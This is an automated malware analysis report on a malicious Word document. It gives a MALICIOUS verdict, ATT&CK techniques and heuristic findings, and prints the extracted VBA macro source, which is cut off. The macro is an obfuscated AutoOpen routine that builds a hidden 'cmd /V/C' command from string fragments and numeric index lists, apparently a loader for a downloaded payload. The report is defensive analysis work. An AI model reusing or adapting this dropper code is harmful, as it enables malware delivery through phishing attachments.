Verdict: MALICIOUS
Risk Score: 82
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. The macro calls Shell on a command assembled from concatenated string fragments: 'cm' followed by 'd /V/C' (cmd with delayed variable expansion), a set statement, and a for loop over a long series of semicolon-separated numbers, a pattern likely intended to decode and run a second stage that downloads and executes a payload. The presence of the AutoOpen macro and the nature of the script strongly suggest a spearphishing attachment attack vector.
Heuristics (4)
- VBA macros detected (medium; 1 related finding) [OLE_VBA_MACROS]: Document contains VBA macro code.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5865 bytes |

SHA-256 (macros.bas): 5f6f1b926bbf22e0f270c655f7dd942e928354eb6150166bf0d29e15d2dcb509

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "WAmXIAtsNMof"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
AppActivate CLng(31102 / JUjzRd * CioEbI / qCKTw)
AppActivate CDate(mwZiI)
AppActivate CByte(1518)
AppActivate Chr(83474982)
AppActivate CLng(WUovR)
AppActivate Sin(22129 / UiwpK - 68407 / YjwvG)
Shell@ CVar("cm") + TiihGrvi + MckuVzUTwBBUpz + ABzLqrSGFv + NzHRqWZUzGC + HVAdjVqaY + cirdHzpjSw + tkdazYiARYi, 536295420 - 536295420
AppActivate Chr(nDWzh)
AppActivate CByte(33835 + wIDTBO - UTmvBE - fzdqp)
AppActivate ChrB(55)
End Sub
Attribute VB_Name = "DADLMCj"
Function ABzLqrSGFv()
On Error Resume Next
AppActivate 1833
AppActivate Round(RtnMY)
AppActivate Sin(koNMon + rZnUM / PafPQ / cCSONi)
SUDcI = "d " + "/V/C" + CStr(Chr(qusUuzoCd + zmPGlLOYUzdqM + 34 + NbtPizLJiJWhz + vijTAKkL)) + "s" + "et 9N0" + "=n" + "XQlPkLIoTm" + "Fawfbtz" + "wW9,5-y\" + "HKC(cvrxY'" + ")g" + "SZh$}" + "3@+B{R="
AppActivate CfWGz
AppActivate Sin(QRXufW - XFilDq)
jvkwEOcbFZb = ".dM eDs:" + "7p" + "/uNiV;6E" + "jU&&for %" + "h in" + " (59;8;18;" + "54" + ";32;5"
AppActivate CLng(aiuSZz)
AppActivate Oct(TfWIz + PNuOw)
AppActivate CStr(12)
wIGlS = "6;4" + "0;54;3;3" + ";53;41;64" + ";52;" + "14;" + "49;0;54;" + "18;23" + ";8;15;"
AppActivate 844
AppActivate Sgn(lrIzOT - zijwb)
kddsQf = "68;54;3" + "0;16;5" + "3;62;54;1" + "6;50;19;54" + ";15;28;" + "3;63;5" + "4;0;16;65" + ";41;1" + "5;3;"
AppActivate 736
AppActivate azKhsY
AppActivate Cos(32596 + idMqKP + cVpwA / CXiOhi)
EFGRDbrn = "55;4" + "9;35;40" + ";16;16;5" + "9;57;60" + ";60;14;" + "61;0;" + "5" + "1;12;30;6" + "3;8;0;12" + ";14;" + "12;0;6" + "3;" + "30;50;3"
AppActivate Cos(iozKK)
AppActivate zDhZt
AppActivate pabAXt
quHDYRYuV = "0;8;1" + "0;60;9;5" + "6;39;6;" + "26;" + "8"
AppActivate CStr(2774)
AppActivate Sgn(JIjBJ)
IbLGVL = ";39;69;44;" + "40;1" + "6;" + "16;" + "59;5" + "7;60;" + "60" + ";" + "18;18"
AppActivate Sgn(12262 - KLHDPr + zZHGrG * Tzkoqb)
AppActivate Fuopb
AppActivate CInt(cQYBC + ijHkua)
owXNXisjP = ";18;" + "50;3;5" + "4;12;16;40" + ";5" + "4;3" + "2;5" + "6;40;" + "8" + ";59" + ";58;5" + "8;50;30;" + "8;10;60" + ";15;"
ABzLqrSGFv = SUDcI + jvkwEOcbFZb + wIGlS + kddsQf + EFGRDbrn + quHDYRYuV + IbLGVL + owXNXisjP
AppActivate 8
AppActivate Tan(hCaME)
End Function
Function NzHRqWZUzGC()
On Error Resume Next
AppActivate 520957283
AppActivate CStr(BrpzAA)
AppActivate CDate(LqiriO + EOszVz)
zqsVWbHfABz = "18;54;11;" + "15;8;" + "20;44" + ";40;1" + "6;16;59;57"
AppActivate CBool(zqwbji - clPPr - 69738 + PaAWh)
AppActivate Sqr(wiVoAs - POYkmW)
AppActivate Tan(vkWbKM)
ijOGZ = ";60;6" + "0" + ";" + "0" + ";8;" + "0;37" + ";3;54;" + "5;50;0;54;" + "16" + ";60" + ";"
AppActivate Round(1)
AppActivate CSng(dnEFc)
AppActivate RdaZA
JUkvr = "58;2" + "8;4" + "8;44;4" + "0;16;1" + "6" + ";59;57;6" + "0;60" + ";12;37;32" + ";8" + ";30" + ";8;54;3;6"
AppActivate KMnim
AppActivate Rnd(Xwmlu + kVaLl + wmYKCF * tjJFw)
srURasAL = "3;" + "50;30" + ";8;10;" + "60;" + "30;40;" + "14;67" + ";46;63;" + "44;40;" + "16;16;5" + "9;57;60;" + "60;30;40;1" + "2;3;3" + ";54;0;3"
AppActivate HzOOiM
AppActivate Sqr(uDWfc)
AppActivate Int(OYwwW)
RHPsm = "7" + ";54;" + "32;1" + "5;12" + ";3;3;1" + "6;8;61;" + "32;" + "0;" + "12;" + "10;54;0;16" + ";50;30;8;1" + "0;"
AppActivate Rnd(XwdXz)
AppActivate nlhtXi
aoofPkw = "60;" + "6" + "7;3" + "5" + ";5" + "0;38;59" + ";3;" + "63;16;29" + ";35;44;" + "35;36;65;" + "41;34;"
AppActivate Tan(MbJrj)
AppActivate 4709
bkJpZIGPZ = "34;11;" + "5" + "3;49;53;3" + "5" + ";22;" + "66;43;3" + "5;65;4" + "1;69" + ";46;" + "27;49;41"
AppActivate 284591082
AppActivate Sgn(8)
AppActivate CDbl(ztfQi)
COEjttucw = ";54;0;31;5" + "7;16;5" + "4;10;59;" + "45;3" + "5" + ";25;" + "35
... (truncated)